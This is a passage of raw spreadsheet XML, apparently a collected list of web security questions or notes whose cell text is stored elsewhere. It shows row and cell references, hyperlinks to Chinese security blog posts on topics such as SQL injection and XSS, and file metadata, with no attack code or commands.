        <v>721</v>
      </c>
      <c r="C406" s="6" t="s">
        <v>722</v>
      </c>
    </row>
    <row r="407" ht="76.65" customHeight="1" spans="1:3">
      <c r="A407" s="2">
        <v>405</v>
      </c>
      <c r="B407" s="5" t="s">
        <v>723</v>
      </c>
      <c r="C407" s="6" t="s">
        <v>724</v>
      </c>
    </row>
    <row r="408" ht="63.35" customHeight="1" spans="1:3">
      <c r="A408" s="2">
        <v>406</v>
      </c>
      <c r="B408" s="5" t="s">
        <v>725</v>
      </c>
      <c r="C408" s="49" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="409" customHeight="1" spans="1:3">
      <c r="A409" s="2">
        <v>407</v>
      </c>
      <c r="B409" s="3" t="s">
        <v>727</v>
      </c>
      <c r="C409" s="50"/>
    </row>
    <row r="410" ht="74.15" customHeight="1" spans="1:3">
      <c r="A410" s="2">
        <v>408</v>
      </c>
      <c r="B410" s="51" t="s">
        <v>728</v>
      </c>
      <c r="C410" s="49" t="s">
        <v>729</v>
      </c>
    </row>
    <row r="411" ht="391.1" customHeight="1" spans="1:3">
      <c r="A411" s="2">
        <v>409</v>
      </c>
      <c r="B411" s="10" t="s">
        <v>730</v>
      </c>
      <c r="C411" s="49" t="s">
        <v>731</v>
      </c>
    </row>
    <row r="412" ht="192.1" customHeight="1" spans="1:3">
      <c r="A412" s="2">
        <v>410</v>
      </c>
      <c r="B412" s="10" t="s">
        <v>732</v>
      </c>
      <c r="C412" s="6" t="s">
        <v>733</v>
      </c>
    </row>
    <row r="413" ht="121.1" customHeight="1" spans="1:3">
      <c r="A413" s="2">
        <v>411</v>
      </c>
      <c r="B413" s="52" t="s">
        <v>734</v>
      </c>
      <c r="C413" s="6" t="s">
        <v>735</v>
      </c>
    </row>
    <row r="414" ht="61.1" customHeight="1" spans="1:3">
      <c r="A414" s="2">
        <v>412</v>
      </c>
      <c r="B414" s="10" t="s">
        <v>736</v>
      </c>
      <c r="C414" s="6" t="s">
        <v>737</v>
      </c>
    </row>
    <row r="415" ht="101.1" customHeight="1" spans="1:3">
      <c r="A415" s="2">
        <v>413</v>
      </c>
      <c r="B415" s="10" t="s">
        <v>738</v>
      </c>
      <c r="C415" s="6" t="s">
        <v>739</v>
      </c>
    </row>
    <row r="416" ht="242.1" customHeight="1" spans="1:3">
      <c r="A416" s="2">
        <v>414</v>
      </c>
      <c r="B416" s="10" t="s">
        <v>740</v>
      </c>
      <c r="C416" s="6" t="s">
        <v>741</v>
      </c>
    </row>
    <row r="417" ht="46.1" customHeight="1" spans="1:3">
      <c r="A417" s="2">
        <v>415</v>
      </c>
      <c r="B417" s="10" t="s">
        <v>742</v>
      </c>
      <c r="C417" s="6" t="s">
        <v>743</v>
      </c>
    </row>
    <row r="418" ht="124.1" customHeight="1" spans="1:3">
      <c r="A418" s="2">
        <v>416</v>
      </c>
      <c r="B418" s="10" t="s">
        <v>744</v>
      </c>
      <c r="C418" s="6" t="s">
        <v>745</v>
      </c>
    </row>
    <row r="419" ht="71.1" customHeight="1" spans="1:3">
      <c r="A419" s="2">
        <v>417</v>
      </c>
      <c r="B419" s="10" t="s">
        <v>746</v>
      </c>
      <c r="C419" s="6" t="s">
        <v>747</v>
      </c>
    </row>
    <row r="420" ht="35.1" customHeight="1" spans="1:3">
      <c r="A420" s="2">
        <v>418</v>
      </c>
      <c r="B420" s="10" t="s">
        <v>748</v>
      </c>
      <c r="C420" s="6" t="s">
        <v>749</v>
      </c>
    </row>
    <row r="421" ht="77.1" customHeight="1" spans="1:3">
      <c r="A421" s="2">
        <v>419</v>
      </c>
      <c r="B421" s="10" t="s">
        <v>750</v>
      </c>
      <c r="C421" s="6" t="s">
        <v>751</v>
      </c>
    </row>
    <row r="422" customHeight="1" spans="1:3">
      <c r="A422" s="2">
        <v>420</v>
      </c>
      <c r="B422" s="10" t="s">
        <v>752</v>
      </c>
      <c r="C422" s="8" t="s">
        <v>753</v>
      </c>
    </row>
    <row r="423" customHeight="1" spans="1:3">
      <c r="A423" s="2">
        <v>421</v>
      </c>
      <c r="B423" s="10" t="s">
        <v>754</v>
      </c>
      <c r="C423" s="3" t="s">
        <v>755</v>
      </c>
    </row>
    <row r="424" ht="93.1" customHeight="1" spans="1:3">
      <c r="A424" s="2">
        <v>422</v>
      </c>
      <c r="B424" s="10" t="s">
        <v>756</v>
      </c>
      <c r="C424" s="6" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="425" ht="81.1" customHeight="1" spans="1:3">
      <c r="A425" s="2">
        <v>423</v>
      </c>
      <c r="B425" s="10" t="s">
        <v>758</v>
      </c>
      <c r="C425" s="6" t="s">
        <v>759</v>
      </c>
    </row>
    <row r="426" ht="37.1" customHeight="1" spans="1:3">
      <c r="A426" s="2">
        <v>424</v>
      </c>
      <c r="B426" s="52" t="s">
        <v>760</v>
      </c>
      <c r="C426" s="6" t="s">
        <v>761</v>
      </c>
    </row>
    <row r="427" customHeight="1" spans="1:2">
      <c r="A427" s="2">
        <v>425</v>
      </c>
      <c r="B427" s="53" t="s">
        <v>762</v>
      </c>
    </row>
    <row r="428" ht="33.1" customHeight="1" spans="1:3">
      <c r="A428" s="2">
        <v>426</v>
      </c>
      <c r="B428" s="9" t="s">
        <v>763</v>
      </c>
      <c r="C428" s="6" t="s">
        <v>764</v>
      </c>
    </row>
    <row r="429" ht="97.1" customHeight="1" spans="1:3">
      <c r="A429" s="2">
        <v>427</v>
      </c>
      <c r="B429" s="10" t="s">
        <v>765</v>
      </c>
      <c r="C429" s="6" t="s">
        <v>766</v>
      </c>
    </row>
    <row r="430" customHeight="1" spans="1:2">
      <c r="A430" s="2">
        <v>428</v>
      </c>
      <c r="B430" s="53" t="s">
        <v>767</v>
      </c>
    </row>
    <row r="431" customHeight="1" spans="1:3">
      <c r="A431" s="2">
        <v>429</v>
      </c>
      <c r="B431" s="9" t="s">
        <v>768</v>
      </c>
      <c r="C431" s="8" t="s">
        <v>769</v>
      </c>
    </row>
    <row r="432" ht="49.1" customHeight="1" spans="1:3">
      <c r="A432" s="2">
        <v>430</v>
      </c>
      <c r="B432" s="10" t="s">
        <v>770</v>
      </c>
      <c r="C432" s="6" t="s">
        <v>771</v>
      </c>
    </row>
    <row r="433" customHeight="1" spans="1:3">
      <c r="A433" s="2">
        <v>431</v>
      </c>
      <c r="B433" s="10" t="s">
        <v>772</v>
      </c>
      <c r="C433" s="8" t="s">
        <v>773</v>
      </c>
    </row>
    <row r="434" ht="43.1" customHeight="1" spans="1:3">
      <c r="A434" s="2">
        <v>432</v>
      </c>
      <c r="B434" s="10" t="s">
        <v>774</v>
      </c>
      <c r="C434" s="6" t="s">
        <v>775</v>
      </c>
    </row>
    <row r="435" ht="84" spans="1:3">
      <c r="A435" s="2">
        <v>433</v>
      </c>
      <c r="B435" s="6" t="s">
        <v>776</v>
      </c>
      <c r="C435" s="6" t="s">
        <v>777</v>
      </c>
    </row>
    <row r="436" ht="51" spans="1:3">
      <c r="A436" s="2">
        <v>434</v>
      </c>
      <c r="B436" s="3" t="s">
        <v>778</v>
      </c>
      <c r="C436" s="6" t="s">
        <v>779</v>
      </c>
    </row>
    <row r="437" ht="118" spans="1:3">
      <c r="A437" s="2">
        <v>435</v>
      </c>
      <c r="B437" s="3" t="s">
        <v>780</v>
      </c>
      <c r="C437" s="6" t="s">
        <v>781</v>
      </c>
    </row>
    <row r="438" ht="34" spans="1:3">
      <c r="A438" s="2">
        <v>436</v>
      </c>
      <c r="B438" s="3" t="s">
        <v>782</v>
      </c>
      <c r="C438" s="6" t="s">
        <v>783</v>
      </c>
    </row>
    <row r="439" ht="51" spans="1:3">
      <c r="A439" s="2">
        <v>437</v>
      </c>
      <c r="B439" s="3" t="s">
        <v>784</v>
      </c>
      <c r="C439" s="6" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="440" ht="101" spans="1:3">
      <c r="A440" s="2">
        <v>438</v>
      </c>
      <c r="B440" s="3" t="s">
        <v>786</v>
      </c>
      <c r="C440" s="6" t="s">
        <v>787</v>
      </c>
    </row>
    <row r="441" customHeight="1" spans="1:3">
      <c r="A441" s="2">
        <v>439</v>
      </c>
      <c r="B441" s="3" t="s">
        <v>788</v>
      </c>
      <c r="C441" s="8" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="442" customHeight="1" spans="1:3">
      <c r="A442" s="2">
        <v>440</v>
      </c>
      <c r="B442" s="3" t="s">
        <v>506</v>
      </c>
      <c r="C442" s="8" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="443" ht="101" spans="1:3">
      <c r="A443" s="2">
        <v>441</v>
      </c>
      <c r="B443" s="3" t="s">
        <v>790</v>
      </c>
      <c r="C443" s="6" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="444" ht="118" spans="1:3">
      <c r="A444" s="2">
        <v>442</v>
      </c>
      <c r="B444" s="3" t="s">
        <v>792</v>
      </c>
      <c r="C444" s="6" t="s">
        <v>793</v>
      </c>
    </row>
    <row r="445" customHeight="1" spans="1:3">
      <c r="A445" s="2">
        <v>443</v>
      </c>
      <c r="B445" s="3" t="s">
        <v>794</v>
      </c>
      <c r="C445" s="3" t="s">
        <v>795</v>
      </c>
    </row>
    <row r="446" ht="68" spans="1:3">
      <c r="A446" s="2">
        <v>444</v>
      </c>
      <c r="B446" s="3" t="s">
        <v>796</v>
      </c>
      <c r="C446" s="6" t="s">
        <v>797</v>
      </c>
    </row>
    <row r="447" customHeight="1" spans="1:2">
      <c r="A447" s="2">
        <v>445</v>
      </c>
      <c r="B447" s="3" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="448" ht="185" spans="1:3">
      <c r="A448" s="2">
        <v>446</v>
      </c>
      <c r="B448" s="3" t="s">
        <v>799</v>
      </c>
      <c r="C448" s="6" t="s">
        <v>800</v>
      </c>
    </row>
    <row r="449" customHeight="1" spans="1:3">
      <c r="A449" s="2">
        <v>447</v>
      </c>
      <c r="B449" s="3" t="s">
        <v>801</v>
      </c>
      <c r="C449" s="8" t="s">
        <v>802</v>
      </c>
    </row>
    <row r="450" ht="353" spans="1:3">
      <c r="A450" s="2">
        <v>448</v>
      </c>
      <c r="B450" s="3" t="s">
        <v>510</v>
      </c>
      <c r="C450" s="6" t="s">
        <v>803</v>
      </c>
    </row>
    <row r="451" ht="51" spans="1:3">
      <c r="A451" s="2">
        <v>449</v>
      </c>
      <c r="B451" s="3" t="s">
        <v>508</v>
      </c>
      <c r="C451" s="6" t="s">
        <v>804</v>
      </c>
    </row>
    <row r="452" ht="68" spans="1:3">
      <c r="A452" s="2">
        <v>450</v>
      </c>
      <c r="B452" s="3" t="s">
        <v>805</v>
      </c>
      <c r="C452" s="6" t="s">
        <v>806</v>
      </c>
    </row>
    <row r="453" customHeight="1" spans="1:2">
      <c r="A453" s="2">
        <v>451</v>
      </c>
      <c r="B453" s="3" t="s">
        <v>807</v>
      </c>
    </row>
    <row r="454" ht="135" spans="1:3">
      <c r="A454" s="2">
        <v>452</v>
      </c>
      <c r="B454" s="3" t="s">
        <v>808</v>
      </c>
      <c r="C454" s="6" t="s">
        <v>809</v>
      </c>
    </row>
    <row r="455" customHeight="1" spans="1:3">
      <c r="A455" s="2">
        <v>453</v>
      </c>
      <c r="B455" s="3" t="s">
        <v>810</v>
      </c>
      <c r="C455" s="3" t="s">
        <v>811</v>
      </c>
    </row>
    <row r="456" ht="84" spans="1:3">
      <c r="A456" s="2">
        <v>454</v>
      </c>
      <c r="B456" s="3" t="s">
        <v>812</v>
      </c>
      <c r="C456" s="6" t="s">
        <v>813</v>
      </c>
    </row>
    <row r="457" customHeight="1" spans="1:3">
      <c r="A457" s="2">
        <v>455</v>
      </c>
      <c r="B457" s="3" t="s">
        <v>814</v>
      </c>
      <c r="C457" s="3" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="458" customHeight="1" spans="1:2">
      <c r="A458" s="2">
        <v>456</v>
      </c>
      <c r="B458" s="3" t="s">
        <v>816</v>
      </c>
    </row>
    <row r="459" ht="31.65" customHeight="1" spans="1:3">
      <c r="A459" s="2">
        <v>457</v>
      </c>
      <c r="B459" s="3" t="s">
        <v>817</v>
      </c>
      <c r="C459" s="6" t="s">
        <v>818</v>
      </c>
    </row>
    <row r="460" customHeight="1" spans="1:3">
      <c r="A460" s="2">
        <v>458</v>
      </c>
      <c r="B460" s="54" t="s">
        <v>819</v>
      </c>
      <c r="C460" s="3" t="s">
        <v>820</v>
      </c>
    </row>
    <row r="461" customHeight="1" spans="1:3">
      <c r="A461" s="2">
        <v>459</v>
      </c>
      <c r="B461" s="3" t="s">
        <v>821</v>
      </c>
      <c r="C461" s="3" t="s">
        <v>822</v>
      </c>
    </row>
    <row r="462" customHeight="1" spans="1:3">
      <c r="A462" s="2">
        <v>460</v>
      </c>
      <c r="B462" s="3" t="s">
        <v>823</v>
      </c>
      <c r="C462" s="8" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="463" customHeight="1" spans="1:3">
      <c r="A463" s="2">
        <v>461</v>
      </c>
      <c r="B463" s="3" t="s">
        <v>522</v>
      </c>
      <c r="C463" s="3" t="s">
        <v>825</v>
      </c>
    </row>
    <row r="464" customHeight="1" spans="1:3">
      <c r="A464" s="2">
        <v>462</v>
      </c>
      <c r="B464" s="3" t="s">
        <v>826</v>
      </c>
      <c r="C464" s="3" t="s">
        <v>827</v>
      </c>
    </row>
    <row r="465" customHeight="1" spans="1:3">
      <c r="A465" s="2">
        <v>463</v>
      </c>
      <c r="B465" s="3" t="s">
        <v>828</v>
      </c>
      <c r="C465" s="8" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="466" customHeight="1" spans="1:3">
      <c r="A466" s="2">
        <v>464</v>
      </c>
      <c r="B466" s="3" t="s">
        <v>830</v>
      </c>
      <c r="C466" s="8" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="467" customHeight="1" spans="1:3">
      <c r="A467" s="2">
        <v>465</v>
      </c>
      <c r="B467" s="3" t="s">
        <v>831</v>
      </c>
      <c r="C467" s="3" t="s">
        <v>832</v>
      </c>
    </row>
    <row r="468" customHeight="1" spans="1:2">
      <c r="A468" s="2">
        <v>466</v>
      </c>
      <c r="B468" s="3" t="s">
        <v>833</v>
      </c>
    </row>
    <row r="469" customHeight="1" spans="1:2">
      <c r="A469" s="2">
        <v>467</v>
      </c>
      <c r="B469" s="3" t="s">
        <v>834</v>
      </c>
    </row>
    <row r="470" customHeight="1" spans="1:3">
      <c r="A470" s="2">
        <v>468</v>
      </c>
      <c r="B470" s="3" t="s">
        <v>83</v>
      </c>
      <c r="C470" s="3" t="s">
        <v>835</v>
      </c>
    </row>
    <row r="471" customHeight="1" spans="1:3">
      <c r="A471" s="2">
        <v>469</v>
      </c>
      <c r="B471" s="3" t="s">
        <v>836</v>
      </c>
      <c r="C471" s="8" t="s">
        <v>837</v>
      </c>
    </row>
    <row r="472" customHeight="1" spans="1:2">
      <c r="A472" s="2">
        <v>470</v>
      </c>
      <c r="B472" s="3" t="s">
        <v>838</v>
      </c>
    </row>
    <row r="473" customHeight="1" spans="1:3">
      <c r="A473" s="2">
        <v>471</v>
      </c>
      <c r="B473" s="3" t="s">
        <v>81</v>
      </c>
      <c r="C473" s="3" t="s">
        <v>839</v>
      </c>
    </row>
    <row r="474" customHeight="1" spans="1:3">
      <c r="A474" s="2">
        <v>472</v>
      </c>
      <c r="B474" s="3" t="s">
        <v>840</v>
      </c>
      <c r="C474" s="3" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="475" customHeight="1" spans="1:3">
      <c r="A475" s="2">
        <v>473</v>
      </c>
      <c r="B475" s="3" t="s">
        <v>841</v>
      </c>
      <c r="C475" s="8" t="s">
        <v>842</v>
      </c>
    </row>
    <row r="476" customHeight="1" spans="1:3">
      <c r="A476" s="2">
        <v>474</v>
      </c>
      <c r="B476" s="3" t="s">
        <v>843</v>
      </c>
      <c r="C476" s="6" t="s">
        <v>844</v>
      </c>
    </row>
    <row r="477" customHeight="1" spans="1:3">
      <c r="A477" s="2">
        <v>475</v>
      </c>
      <c r="B477" s="3" t="s">
        <v>845</v>
      </c>
      <c r="C477" s="8" t="s">
        <v>846</v>
      </c>
    </row>
    <row r="478" customHeight="1" spans="1:3">
      <c r="A478" s="2">
        <v>476</v>
      </c>
      <c r="B478" s="3" t="s">
        <v>847</v>
      </c>
      <c r="C478" s="8" t="s">
        <v>848</v>
      </c>
    </row>
    <row r="479" customHeight="1" spans="1:3">
      <c r="A479" s="2">
        <v>477</v>
      </c>
      <c r="B479" s="3" t="s">
        <v>849</v>
      </c>
      <c r="C479" s="6" t="s">
        <v>850</v>
      </c>
    </row>
    <row r="480" customHeight="1" spans="1:2">
      <c r="A480" s="2">
        <v>478</v>
      </c>
      <c r="B480" s="3" t="s">
        <v>851</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection formatCells="0" insertHyperlinks="0" autoFilter="0"/>
  <hyperlinks>
    <hyperlink ref="C8" r:id="rId1" display="https://blog.csdn.net/strive_____/article/details/100716849"/>
    <hyperlink ref="C268" r:id="rId2" display="https://www.jianshu.com/p/aca81913f874" tooltip="https://www.jianshu.com/p/aca81913f874"/>
    <hyperlink ref="C393" r:id="rId3" display="https://www.cnblogs.com/xp0813/p/11410746.html" tooltip="https://www.cnblogs.com/xp0813/p/11410746.html"/>
    <hyperlink ref="C270" r:id="rId4" display="https://www.anquanke.com/post/id/84975" tooltip="https://www.anquanke.com/post/id/84975"/>
    <hyperlink ref="C274" r:id="rId5" display="https://blog.csdn.net/wsnbbz/article/details/105286840"/>
    <hyperlink ref="C272" r:id="rId6" display="https://www.it610.com/article/4785892.htm" tooltip="https://www.it610.com/article/4785892.htm"/>
    <hyperlink ref="C273" r:id="rId7" display="https://blog.csdn.net/equationdz/article/details/2519230?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control" tooltip="https://blog.csdn.net/equationdz/article/details/2519230?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3"/>
    <hyperlink ref="C282" r:id="rId8" display="https://blog.csdn.net/dmzing/article/details/52404455" tooltip="https://blog.csdn.net/dmzing/article/details/52404455"/>
    <hyperlink ref="C284" r:id="rId9" display="https://zhuanlan.zhihu.com/p/86067226" tooltip="https://zhuanlan.zhihu.com/p/86067226"/>
    <hyperlink ref="C31" r:id="rId10" display="http://www.pinlue.com/article/2019/03/2707/468432227534.html"/>
    <hyperlink ref="C286" r:id="rId11" display="https://blog.csdn.net/weixin_33720956/article/details/93997626" tooltip="https://blog.csdn.net/weixin_33720956/article/details/93997626"/>
    <hyperlink ref="C13" r:id="rId12" display="https://www.cnblogs.com/-mo-/p/12337766.html"/>
    <hyperlink ref="C14" r:id="rId13" display="https://www.cnblogs.com/taostaryu/p/10547132.html"/>
    <hyperlink ref="C15" r:id="rId14" display="https://blog.csdn.net/a15803617402/article/details/82939202"/>
    <hyperlink ref="C16" r:id="rId15" display="https://www.cnblogs.com/bmjoker/p/9548962.html"/>
    <hyperlink ref="C17" r:id="rId16" display="https://www.cnblogs.com/qiudabai/p/9763739.html"/>
    <hyperlink ref="C23" r:id="rId17" display="https://blog.csdn.net/jb19900111/article/details/18619653?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control&amp;dist_request_id=1328603.386.16148619991812411&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-3.control"/>
    <hyperlink ref="C21" r:id="rId18" display="https://www.cnblogs.com/ms0708/p/14044531.html"/>
    <hyperlink ref="C462" r:id="rId19" display="https://www.cnblogs.com/anbuxuan/p/11837007.html"/>
    <hyperlink ref="C466" r:id="rId19" display="https://www.cnblogs.com/anbuxuan/p/11837007.html"/>
    <hyperlink ref="C19" r:id="rId20" display="https://blog.csdn.net/m0_54377930/article/details/113139412"/>
    <hyperlink ref="C471" r:id="rId21" display="http://linux.ctocio.com.cn/linux/2020/0914/37333.html"/>
    <hyperlink ref="C477" r:id="rId22" display="https://www.freebuf.com/articles/web/170970.html" tooltip="https://www.freebuf.com/articles/web/170970.html"/>
    <hyperlink ref="C441" r:id="rId15" display="https://www.cnblogs.com/bmjoker/p/9548962.html"/>
    <hyperlink ref="C215" r:id="rId23" display="https://blog.csdn.net/weixin_30852451/article/details/98668307"/>
    <hyperlink ref="C217" r:id="rId24" display="https://blog.csdn.net/weixin_42298415/article/details/113432858"/>
    <hyperlink ref="C218" r:id="rId25" display="https://blog.csdn.net/weixin_45677119/article/details/111459258"/>
    <hyperlink ref="C475" r:id="rId26" display="https://blog.csdn.net/weixin_44023680/article/details/111702074?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.control&amp;dist_request_id=&amp;depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.control"/>
    <hyperlink ref="C35" r:id="rId27" display="https://blog.csdn.net/qq_40907977/article/details/106193136"/>
    <hyperlink ref="C195" r:id="rId28" display="https://blog.csdn.net/cxrpty/article/details/104417374"/>
    <hyperlink ref="C422" r:id="rId29" display="https://www.secrss.com/articles/13426"/>
    <hyperlink ref="C38" r:id="rId30" display="https://www.cnblogs.com/lcamry/p/5505110.html"/>
    <hyperlink ref="C478" r:id="rId31" display="https://zhuanlan.zhihu.com/p/161616450"/>
    <hyperlink ref="C208" r:id="rId32" display="https://blog.csdn.net/jessiecollection/article/details/9850435?ops_request_misc=&amp;request_id=&amp;biz_id=102&amp;utm_term=sql%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB%E7%9A%84%E5%8D%B1%E5%AE%B3&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-6-9850435.pc_search_result_cache"/>
    <hyperlink ref="C465" r:id="rId33" display="https://www.cnblogs.com/he1m4n6a/p/9245155.html"/>
    <hyperlink ref="C431" r:id="rId34" display="https://blog.csdn.net/feng_an_qi/article/details/45666813"/>
    <hyperlink ref="C433" r:id="rId35" display="https://blog.csdn.net/m0_38103658/article/details/100581450l"/>
    <hyperlink ref="C442" r:id="rId36" display="https://blog.csdn.net/u012991692/article/details/82937060"/>
    <hyperlink ref="C449" r:id="rId37" display="https://blog.csdn.net/weixin_30699465/article/details/99789470"/>
    <hyperlink ref="C127" r:id="rId38" display="https://www.cnblogs.com/l1pe1/p/9213060.html"/>
    <hyperlink ref="C140" r:id="rId39" display="https://m.baidu.com/from=844b/bd_page_type=1/ssid=835db7abb8e7323737a270/uid=0/pu=usm%400%2Csz%401320_2001%2Cta%40iphone_1_14.4_25_14.0/baiduid=24E02FDDB98DA27BB928D14C761D60CA/w=0_10_/t=iphone/l=1/tc?clk_type=1&amp;vit=osres&amp;l=1&amp;baiduid=24E02FDDB98DA27BB928D14C761D60CA&amp;t=iphone&amp;ref=www_iphone&amp;from=844b&amp;ssid=835db7abb8e7323737a270&amp;lid=9317663745153111717&amp;bd_page_type=1&amp;pu=usm%400%2Csz%401320_2001%2Cta%40iphone_1_14.4_25_14.0&amp;order=1&amp;fm=alop&amp;isAtom=1&amp;waplogo=1&amp;is_baidu=0&amp;tj=www_normal_1_0_10_title&amp;m=8&amp;cltj=normal_title&amp;asres=1&amp;title=css中的xss漏洞_kuiyuexiang的专栏-CSDN博客&amp;clk_info=%7B%22tplname%22%3A%22www_normal%22%2C%22srcid%22%3A1599%2C%22t%22%3A1614910592551%2C%22xpath%22%3A%22div-article-section-div-div-section-div-div-div-a-div-div%22%7D&amp;wd=&amp;eqid=814efdcf226316a5100000046041947c&amp;w_qd=IlPT2AEptyoA_yk5sxod5QsrrBZUmIWqFQW&amp;bdver=2&amp;tcplug=1&amp;dict=-1&amp;sec=10586&amp;di=0c4f947a5765f7c1&amp;bdenc=1&amp;tch=124.0.261.228.0.0&amp;nsrc=k4638UOP4j5EzwRkgkRceuhcGPz8lrCRugo%2BqJFdrCUtMKYtNzGdBpHR49J3XlkW7Mvuc34qugqA0OiR1Fs"/>
    <hyperlink ref="C141" r:id="rId40" display="https://www.secpulse.com/archives/44299.html"/>
  </hyperlinks>
  <pageMargins left="0.699305555555556" right="0.699305555555556"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90384615384615" defaultRowHeight="16.8"/>
  <sheetData/>
  <sheetProtection formatCells="0" insertHyperlinks="0" autoFilter="0"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>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s t a n d a l o n e = ' y e s ' ? > 
 < w o P r o p s   x m l n s = " h t t p s : / / w e b . w p s . c n / e t / 2 0 1 8 / m a i n "   x m l n s : s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / s p r e a d s h e e t m l / 2 0 0 6 / m a i n " > 
   < w o S h e e t s P r o p s > 
     < w o S h e e t P r o p s   s h e e t S t i d = " 1 "   i n t e r l i n e C o l o r = " 0 "   i s D b S h e e t = " 0 "   i n t e r l i n e O n O f f = " 0 " / > 
   < / w o S h e e t s P r o p s > 
   < w o B o o k P r o p s > 
     < b o o k S e t t i n g s   f i l t e r T y p e = " c o n n "   i s F i l t e r S h a r e d = " 1 "   i s A u t o U p d a t e P a u s e d = " 0 "   i s M e r g e T a s k s A u t o U p d a t e = " 0 " / > 
   < / w o B o o k P r o p s > 
 < / w o P r o p s > 
 
</file>

<file path=customXml/item2.xml>��< ? x m l   v e r s i o n = ' 1 . 0 '   s t a n d a l o n e = ' y e s ' ? > 
 < p i x e l a t o r s   x m l n s = " h t t p s : / / w e b . w p s . c n / e t / 2 0 1 8 / m a i n "   x m l n s : s = " h t t p : / / s c h e m a s . o p e n x m l f o r m a t s . o r g / s p r e a d s h e e t m l / 2 0 0 6 / m a i n " > 
   < p i x e l a t o r L i s t   s h e e t S t i d = " 1 " / > 
   < p i x e l a t o r L i s t   s h e e t S t i d = " 4 " / > 
 < / p i x e l a t o r s > 
 
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{06C82605-B75B-4693-9329-32AAD527C692}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{224D003E-15C9-4FFE-AB16-9E66474EAE4E}">
  <ds:schemaRefs/>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Application>WWO_base_provider_20210929220102-c9fcf70066</Application>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>工作表</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="2" baseType="lpstr">
      <vt:lpstr>互联网搜集</vt:lpstr>
      <vt:lpstr>WpsReserved_CellImgList</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小仙女🧚‍♀️的iPad</dc:creator>
  <cp:lastModifiedBy>KKKKKKento</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-09-22T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-26T14:26:17Z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2052-5.3.0.7872</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>89E6A134510FA26309C448644F664641_43</vt:lpwstr>
  </property>
</Properties>
</file>